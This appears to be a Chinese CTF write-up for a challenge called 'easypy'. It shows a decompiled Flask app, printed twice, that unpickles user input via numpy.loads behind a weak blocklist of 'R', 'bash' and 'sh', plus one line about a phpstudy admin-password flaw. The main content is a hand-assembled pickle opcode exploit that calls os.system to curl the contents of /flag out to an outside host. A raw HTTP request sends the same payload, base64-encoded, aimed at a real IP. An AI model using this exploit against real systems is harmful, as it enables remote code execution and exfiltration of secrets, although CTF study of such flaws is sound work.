import numpy, base64
from flask import Flask, Response, request
# Flask application object; the route decorators below register their handlers on it.
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Landing page: return a fixed Chinese greeting for both GET and POST."""
    greeting = '小p想要找一个女朋友,你能帮他找找看么?'
    return greeting
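@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
    """Deserialize a client-supplied, base64-encoded blob and report a status.

    Reads ``data`` from the query string or form body, base64-decodes it,
    rejects decoded payloads containing any of three byte substrings, and
    otherwise hands the bytes to ``numpy.loads``. The deserialized object is
    discarded; only a fixed status string is returned.

    Returns:
        str: ``'有进步了,但是不多'`` when ``data`` is missing, empty or not
        decodable as base64; ``'不能走捷径啊'`` when the decoded bytes match
        the substring filter; ``'可以的,要的就是一种感觉'`` otherwise.
    """
    data = request.values.get('data')
    if not data:
        return '有进步了,但是不多'
    try:
        numpydata = base64.b64decode(data)
    except ValueError:
        # binascii.Error is a ValueError subclass: bad padding or non-ASCII
        # input previously escaped the handler as an unhandled 500.
        return '有进步了,但是不多'
    # Substring blocklist. This is not a security boundary: it only decides
    # which message is returned, not what numpy.loads will execute, and
    # b'bash' is already implied by b'sh'.
    if any(marker in numpydata for marker in (b'R', b'bash', b'sh')):
        return '不能走捷径啊'
    # SECURITY: numpy.loads is a thin alias of pickle.loads, and unpickling
    # attacker-controlled bytes runs arbitrary code in this process. No
    # filter makes an untrusted pickle safe to load; a real service must use
    # a data-only format (e.g. json) or numpy.load(..., allow_pickle=False).
    # Kept here because it is the challenge's intended sink. numpy.loads has
    # also been removed from recent NumPy releases — confirm against the
    # version this app is pinned to.
    numpy.loads(numpydata)
    return '可以的,要的就是一种感觉'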
@app.route('/download', methods=['GET', 'POST'])
def download():
    """Serve ``www.zip`` from the working directory as a download attachment.

    The whole archive is read into memory and returned as
    ``application/octet-stream`` with a fixed ``Content-disposition`` header.
    """
    with open('www.zip', 'rb') as archive:
        payload = archive.read()
    return Response(
        payload,
        content_type='application/octet-stream',
        headers={'Content-disposition': 'attachment;filename=www.zip'},
    )
if __name__ == '__main__':
    # Flask development server bound to all interfaces on privileged port 80 —
    # presumably the challenge container's entrypoint, not a production WSGI setup.
    app.run(host='0.0.0.0', port=80)
# okay decompiling .app.cpython-38.pyc
phpstudy漏洞修改admin密码
勾选系统权限,查看文件并下载flag
2
easypy
扫目录,有download路由,下载源码
import numpy, base64
from flask import Flask, Response, request
# Flask application object; the route decorators below register their handlers on it.
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Landing page: return a fixed Chinese greeting for both GET and POST."""
    greeting = '小p想要找一个女朋友,你能帮他找找看么?'
    return greeting
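@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
    """Deserialize a client-supplied, base64-encoded blob and report a status.

    Reads ``data`` from the query string or form body, base64-decodes it,
    rejects decoded payloads containing any of three byte substrings, and
    otherwise hands the bytes to ``numpy.loads``. The deserialized object is
    discarded; only a fixed status string is returned.

    Returns:
        str: ``'有进步了,但是不多'`` when ``data`` is missing, empty or not
        decodable as base64; ``'不能走捷径啊'`` when the decoded bytes match
        the substring filter; ``'可以的,要的就是一种感觉'`` otherwise.
    """
    data = request.values.get('data')
    if not data:
        return '有进步了,但是不多'
    try:
        numpydata = base64.b64decode(data)
    except ValueError:
        # binascii.Error is a ValueError subclass: bad padding or non-ASCII
        # input previously escaped the handler as an unhandled 500.
        return '有进步了,但是不多'
    # Substring blocklist. This is not a security boundary: it only decides
    # which message is returned, not what numpy.loads will execute, and
    # b'bash' is already implied by b'sh'.
    if any(marker in numpydata for marker in (b'R', b'bash', b'sh')):
        return '不能走捷径啊'
    # SECURITY: numpy.loads is a thin alias of pickle.loads, and unpickling
    # attacker-controlled bytes runs arbitrary code in this process. No
    # filter makes an untrusted pickle safe to load; a real service must use
    # a data-only format (e.g. json) or numpy.load(..., allow_pickle=False).
    # Kept here because it is the challenge's intended sink. numpy.loads has
    # also been removed from recent NumPy releases — confirm against the
    # version this app is pinned to.
    numpy.loads(numpydata)
    return '可以的,要的就是一种感觉'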
@app.route('/download', methods=['GET', 'POST'])
def download():
    """Serve ``www.zip`` from the working directory as a download attachment.

    The whole archive is read into memory and returned as
    ``application/octet-stream`` with a fixed ``Content-disposition`` header.
    """
    with open('www.zip', 'rb') as archive:
        payload = archive.read()
    return Response(
        payload,
        content_type='application/octet-stream',
        headers={'Content-disposition': 'attachment;filename=www.zip'},
    )
if __name__ == '__main__':
    # Flask development server bound to all interfaces on privileged port 80 —
    # presumably the challenge container's entrypoint, not a production WSGI setup.
    app.run(host='0.0.0.0', port=80)
# okay decompiling .app.cpython-38.pyc
过滤了r和反弹shell直接外带
import numpy
import pickle
import base64
import os
# Writeup's proof-of-concept: a hand-assembled pickle opcode stream that runs
# the embedded shell command when it is unpickled. Note the stream is copied
# from the post as-is (the `x81` bytes look like escape sequences that lost
# their backslash in extraction — verify against the original).
opcode=b'''c__builtin__
map
p0
0(S'curl xxx:5555/`cat /flag`'
tp1
0(cos
system
g1
tp2
0g0
g2
x81p3
0c__builtin__
tuple
p4
(g3
tx81.'''
code=base64.b64encode(opcode)
print(code)
# pickle.loads(base64.b64decode(code))
numpydata = base64.b64decode(code)
# Same three-substring check as the challenge's /girlfriends handler, replayed
# locally against the decoded payload.
if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
    print('不能走捷径啊')
else:
    # numpy.loads is pickle.loads, so reaching this branch executes the
    # embedded command in the local interpreter.
    resp = numpy.loads(numpydata)
    print("ok")
POST /girlfriends HTTP/1.1
Host: eci-2ze5mdaorvazf0lpit4y.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
data=Y19fYnVpbHRpbl9fCm1hcApwMAowKFMnY3VybCAxMjQuNzAuMjA2LjIzODo1NTU1L2BjYXQgL2ZsYWdgJwp0cDEKMChjb3MKc3lzdGVtCmcxCnRwMgowZzAKZzIKgXAzCjBjX19idWlsdGluX18KdHVwbGUKcDQKKGczCnSBLg==